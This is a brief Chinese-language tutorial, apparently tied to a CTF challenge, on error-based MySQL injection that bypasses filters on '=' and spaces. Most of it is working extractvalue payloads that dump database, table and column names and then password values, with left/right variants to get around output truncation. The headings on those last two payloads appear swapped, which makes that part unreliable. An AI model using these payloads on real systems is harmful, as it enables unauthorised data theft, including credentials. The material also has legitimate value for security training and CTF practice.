报错注入(=和空格的过滤)

报错注入之等于号和空格的过滤

等于号和空格的过滤

1
2
3
4
"="相当于"like"

"空格"相当于"()"

实例

闭合点为单引号闭合,因此可以构造payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
爆数据库
aaa'^extractvalue(1,concat(0x7e,(select(database()))))%23

爆数据表
aaa'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23

爆数据列
aaa'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23

爆数据列中的内容
aaa'^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1))))%23

左边内容
aaa'^extractvalue(1,right(concat(0x7e,(select(group_concat(password))from(H4rDsq1))),30))%23

右边内容
aaa'^extractvalue(1,left(concat(0x7e,(select(group_concat(password))from(H4rDsq1))),30))%23